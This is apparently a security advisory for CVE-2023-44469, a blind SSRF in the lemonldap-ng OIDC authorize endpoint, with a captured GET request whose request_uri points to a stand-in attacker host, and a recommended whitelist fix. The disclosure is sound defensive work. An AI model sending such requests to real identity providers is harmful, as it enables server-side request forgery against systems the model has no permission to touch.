[Security:low][CVE-2023-44469] SSRF vulnerability in OIDC SSO
Affected version
Version: lemonldap-ng 2.16.2-1
Platform: Apache
Summary
The vulnerability is very similar to other implementations of OIDC. The SSRF occurs, when changing the request_uri parameter in the url.
Here is a blogpost describing similar issues in other implementations: https://security.lauritz-holtmann.de/post/sso-security-ssrf/
Details
Here is the GET request in detail:
GET /oauth2/authorize?client_id=<redacted>&nonce=<redacted>&redirect_uri=<redacted>&response_type=code&scope=openid%20profile%20email&state=<redacted>&request_uri=https://attacker_url.com/requesturi.jwt HTTP/1.1
Host: auth.sso.domain.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.int.govcert.etat.lu/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Authorization: Negotiate
<some base64 redacted>
Cookie: lemonldappdata=<redacted>
A request containing the parameter request_uri set to an arbitrary URL value https://attacker_url.com/requesturi.jwt was sent to the OpenID Authorization Server. As consequence the OpenID Provider interacts with the remote attacker server listening on the specified URL demonstrating that it is vulnerable to SSRF blind issues.
Possible fixes
For security reasons the URI value of request_uri parameter should be carefully validated at server-side, otherwise an attacker could be able to lead the OpenID Provider to interact with an arbitrary server under is control and then potentially exploit SSRF vulnerabilities. It is advisable to define a strict whitelist of allowed URI values (pre-registered during the OpenID client registration process) for the request_uri parameter.